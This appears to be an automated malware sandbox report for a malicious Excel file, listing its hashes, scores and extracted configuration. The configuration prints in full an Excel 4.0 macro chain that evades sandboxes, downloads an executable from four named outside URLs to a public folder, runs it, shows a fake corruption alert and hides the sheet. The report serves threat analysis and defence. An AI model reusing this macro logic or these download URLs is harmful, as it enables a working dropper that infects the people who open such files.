Overview

overview

10

Static

static

10

89e6e635c1...4c.xls

windows7_x64

1

89e6e635c1...4c.xls

windows10_x64

1

Resubmissions

28-12-2022 03:41

221228-d8w4gscd5x 10

09-04-2020 14:52

200409-4eb6rljnsx 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c

  • Size

    111KB

  • Sample

    200409-4eb6rljnsx

  • MD5

    c7f273947124d844d77b7c376a9393b4

  • SHA1

    3497bea7fbb12fa3d62fce071fdb22ca53bfbddb

  • SHA256

    89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c

  • SHA512

    b44a5e25276cb98cffa8a5d815d1802e817101cf028216761efb85f65610da2af1741f549fa7738985650dda8727bb7ccc1f36e5ac8baf2fc2ec004bf2c07b0d

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png

http://icietdemain.fr/contents/2020/02/idle/222222.png

http://careers.sorint.it/idle/33333.png

http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png
Attributes
  • formulas

    IF(GET.WORKSPACE(42),,CLOSE(TRUE)) GET.WORKSPACE(13) GET.WORKSPACE(14) IF(R$1C$0<770,CLOSE(FALSE),) IF(R$2C$0<380,CLOSE(FALSE),) IF(GET.WORKSPACE(19),,CLOSE(TRUE)) CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","c:\Users\Public\asd2asff32.exe",0,0) IF(R$6C$0<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://icietdemain.fr/contents/2020/02/idle/222222.png","c:\Users\Public\asd2asff32.exe",0,0),GOTO(EXEC("c:\Users\Public\asd2asff32.exe"))) IF(R$7C$0<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://careers.sorint.it/idle/33333.png","c:\Users\Public\asd2asff32.exe",0,0),GOTO(EXEC("c:\Users\Public\asd2asff32.exe"))) IF(R$8C$0<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png","c:\Users\Public\asd2asff32.exe",0,0),GOTO(EXEC("c:\Users\Public\asd2asff32.exe"))) IF(R$9C$0<0,CLOSE(FALSE),) EXEC("c:\Users\Public\asd2asff32.exe") ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.",2) CLOSE(FALSE) WORKBOOK.HIDE("e6oGgi9gZN",TRUE)

Targets

    • Target

      89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c

    • Size

      111KB

    • MD5

      c7f273947124d844d77b7c376a9393b4

    • SHA1

      3497bea7fbb12fa3d62fce071fdb22ca53bfbddb

    • SHA256

      89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c

    • SHA512

      b44a5e25276cb98cffa8a5d815d1802e817101cf028216761efb85f65610da2af1741f549fa7738985650dda8727bb7ccc1f36e5ac8baf2fc2ec004bf2c07b0d

    Score
    1/10
    behavioral1behavioral2

MITRE ATT&CK Enterprise v6

Tasks